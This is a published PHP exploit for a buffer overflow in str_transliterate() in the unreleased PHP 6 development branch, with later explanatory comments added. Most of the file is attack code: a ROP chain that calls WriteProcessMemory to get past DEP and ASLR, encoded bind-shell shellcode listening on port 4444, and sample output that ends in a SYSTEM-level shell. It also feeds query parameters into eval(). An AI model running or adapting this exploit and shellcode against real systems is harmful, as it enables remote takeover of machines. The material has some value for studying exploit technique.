
# Title : PHP 6.0 Dev str_transliterate() Buffer overflow - NX + ASLR Bypass
# Published : 2010-04-13
# Author : Matteo Memelli


<?php
/*
04-06-2010 PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
Tested on Windows 2008 SP1 DEP alwayson 
Matteo Memelli aka ryujin ( AT ) offsec.com
original sploit: http://www.exploit-db.com/exploits/12051 (Author: Pr0T3cT10n)

Thx to muts and Elwood for helping ;)

Bruteforce script is attached in base64 format.

root@bt:~# ./brute_php6.py 172.16.30.249 /pwnPhp6.php win2k8
(*) Php6 str_transliterate() bof || ryujin # offsec.com
(*) Bruteforcing WPM ret address...
(+) Trying base address 0x78000000
(+) Trying base address 0x77000000
(+) Trying base address 0x76000000
(+) Trying base address 0x75000000
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:\wamp\bin\apache\Apache2.2.11>whoami
whoami
nt authority\system
*/

// Proof-of-concept payload builder for the str_transliterate() overflow in
// the PHP 6 development tree (a branch that was never released; the function
// does not exist in shipped PHP versions). Everything below only runs when the
// unicode.semantics directive is enabled, which is what makes the "\u" escape
// strings meaningful to the engine.
//
// NOTE(review): error_reporting(0) disables every diagnostic, so a failed
// attempt leaves no PHP-side error entry; from a defender's view the
// observable signals are the request itself (pos_s/pos_e/off_s/off_e query
// parameters) and the worker process dying rather than returning.
error_reporting(0);

// Four attacker-controlled values read straight from the query string. They
// are never validated or cast before being handed to dechex() and eval()
// further down.
$base_s = $_GET['pos_s'];
$base_e = $_GET['pos_e'];
$off_s  = $_GET['off_s'];
$off_e  = $_GET['off_e'];

// ini_get_bool() is defined later in this file; PHP hoists function
// declarations, so calling it here is valid.
if(ini_get_bool('unicode.semantics')) {
 $buff    = str_repeat("u4141", 32);
 $tbp     = "u2650u6EE5"; // 6EE52650 ADDRESS TO BE PATCHED BY WPM 
 $ptw     = "u2FE0u6EE5"; // 6EE52FE0 POINTER FOR WRITTEN BYTES
 $ret     = "u2660u6EE5"; // 6EE52660 RET AFTER WPM
 $wpmargs = $ret."uFFFFuFFFF".$tbp."uFFFFuFFFFuFFFFuFFFF".$ptw; // WPM ARGS
 // Assembles PHP source text from the request values and executes it with
 // eval() to define $wpm. Request-derived data flowing into eval() is a
 // code-injection sink in its own right; the same assignment could be
 // written directly without eval().
 $garbage     = "$wpm = "\u".strtoupper(sprintf("%02s", dechex($off_s))).strtoupper(sprintf("%02s", dechex($off_e))).
                "\u".strtoupper(sprintf("%02s", dechex($base_s))).strtoupper(sprintf("%02s", dechex($base_e)))."";";
 eval($garbage);
 $nops    = str_repeat("u9090", 41);

 // TH || ROP -> Try Harder or Rest On Pain ;)
 // GETTING SHELLCODE ABSOLUTE ADDRESS
 $rop  = "u40ddu6FF2";   // MOV EAX,EBP/POP ESI/POP EBP/POP EBX/RETN             6FF240DD
 $rop .= "u4242u4242";   // JUNK POPPED IN EBP   
 $rop .= "u4242u4242";   // JUNK POPPED IN EBP  
 $rop .= "u4242u4242";   // JUNK POPPED IN EBP  
 $rop .= "u5DD4u6EE6";   // POP ECX/RETN                                         6EE65DD4     
 $rop .= "uFDBCuFFFF";   // VALUE TO BE POPPED IN ECX (REL. OFFSET TO SHELLCODE) FFFFFDBC
 $rop .= "u222Bu6EED";   // ADD EAX,ECX/POP EBX/POP EBP/RETN                     6EED222B   
 $rop .= "u2650u6EE5";   // JUNK POPPED IN EBP (RET TO SHELLCODE) 
 $rop .= "u2650u6EE5";   // JUNK POPPED IN EBP (RET TO SHELLCODE)

 // PATCHING BUFFER ADDY ARG FOR WPM
 $rop .= "u1C13u6EE6";   // ADD DWORD PTR DS:[EAX],EAX/RETN                      6EE61C13

 // GETTING NUM BYTES IN REGISTER 0x1A0 (LEN OF SHELLCODE)
 $rop .= "uE94Eu6EE6";   // MOV EDX,ECX/POP EBP/RETN                             6EE6E94E   
 $rop .= "u4242u4242";   // JUNK POPPED IN EBP
 $rop .= "u5DD4u6EE6";   // POP ECX/RETN                                         6EE65DD4
 $rop .= "uFF5CuFFFF";   // VALUE TO BE POPPED IN ECX                            FFFFFF5C
 $rop .= "uE94Cu6EE6";   // SUB ECX,EDX/MOV EDX,ECX/POP EBP/RETN                 6EE6E94C
 $rop .= "u4242u4242";   // JUNK POPPED IN EBP

 // PATCHING NUM BYTES TO BE COPIED ARG FOR WPM
 $rop .= "u0C54u6EE7";   // MOV DWORD PTR DS:[EAX+4],ECX/POP EBP/RETN            6EE70C54
 $rop .= "u4242u4242";   // JUNK POPPED IN EBP    

 // REALIGNING ESP TO WPM AND RETURNING TO IT
 $rop .= "u8640u6EE6";   // ADD EAX,-30/POP EBP/RETN                             6EE68640
 $rop .= "u4242u4242";   // JUNK POPPED IN EBP
 $rop .= "u29F1u6EE6";   // ADD EAX,0C/POP EBP/RETN                              6EE629F1
 $rop .= "u4242u4242";   // JUNK POPPED IN EBP
 $rop .= "u29F1u6EE6";   // ADD EAX,0C/POP EBP/RETN                              6EE629F1
 $rop .= "u4242u4242";   // JUNK POPPED IN EBP
 $rop .= "u10ADu6FC3";   // INC EAX/RETN                                         6FC310AD
 $rop .= "u10ADu6FC3";   // INC EAX/RETN                                         6FC310AD
 $rop .= "u10ADu6FC3";   // INC EAX/RETN                                         6FC310AD
 $rop .= "u10ADu6FC3";   // INC EAX/RETN                                         6FC310AD
 $rop .= "u10ADu6FC3";   // INC EAX/RETN                                         6FC310AD
 $rop .= "u10ADu6FC3";   // INC EAX/RETN                                         6FC310AD
 $rop .= "u10ADu6FC3";   // INC EAX/RETN                                         6FC310AD
 $rop .= "u10ADu6FC3";   // INC EAX/RETN                                         6FC310AD
 $rop .= "u2C63u6FC5";   // XCHG EAX,ESP/RETN                                    6FC52C63

           
  
 // unicode bind shellcode port 4444, 318 bytes
 $sh = "u6afcu4debuf9e8uffffu60ffu6c8bu2424u458bu8b3cu057cu0178u8befu184fu5f8b".
       "u0120u49ebu348bu018bu31eeu99c0u84acu74c0uc107u0dcauc201uf4ebu543bu2824".
       "ue575u5f8bu0124u66ebu0c8bu8b4bu1c5fueb01u2c03u898bu246cu611cu31c3u64db".
       "u438bu8b30u0c40u708buad1cu408bu5e08u8e68u0e4eu50ecud6ffu5366u6866u3233".
       "u7768u3273u545fud0ffucb68ufcedu503bud6ffu895fu66e5ued81u0208u6a55uff02".
       "u68d0u09d9uadf5uff57u53d6u5353u5353u5343u5343ud0ffu6866u5c11u5366ue189".
       "u6895u1aa4uc770uff57u6ad6u5110uff55u68d0uada4ue92euff57u53d6uff55u68d0".
       "u49e5u4986uff57u50d6u5454uff55u93d0ue768uc679u5779ud6ffuff55u66d0u646a".
       "u6866u6d63ue589u506au2959u89ccu6ae7u8944u31e2uf3c0ufeaau2d42u42feu932c".
       "u7a8duab38uababu7268ub3feuff16u4475ud6ffu575bu5152u5151u016au5151u5155".
       "ud0ffuad68u05d9u53ceud6ffuff6au37ffud0ffu578bu83fcu64c4ud6ffuff52u68d0".
       "uceefu60e0uff53uffd6ud0d0u4142u4344u4142u4344u4142u4344u4142u4344";

 // Concatenates the pieces into the single oversized string passed to the
 // vulnerable function. No return value is checked; presumably the call is
 // not expected to return normally.
 $exploit = $buff.$ret.$wpm.$wpmargs.$nops.$sh.$rop;
 str_transliterate(0, $exploit, 0);
} else {
 exit("Error! 'unicode.semantics' has be on!rn");
}

/**
 * Reads an ini directive and interprets its value as a boolean.
 *
 * "on", "yes" and "true" count as enabled (except for assert.active, which
 * the original deliberately reports as disabled); "stdout" and "stderr"
 * count as enabled only when the directive is display_errors; any other
 * value is reduced through an int cast, so "1" is true and "0"/"" are false.
 *
 * @param string $a ini directive name as accepted by ini_get()
 * @return bool
 */
function ini_get_bool($a) {
 $raw = ini_get($a);
 $normalized = strtolower($raw);
 if (in_array($normalized, ['on', 'yes', 'true'], true)) {
  return 'assert.active' !== $a;
 }
 if ($normalized === 'stdout' || $normalized === 'stderr') {
  return 'display_errors' === $a;
 }
 return (bool) (int) $raw;
}

/*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*/
?>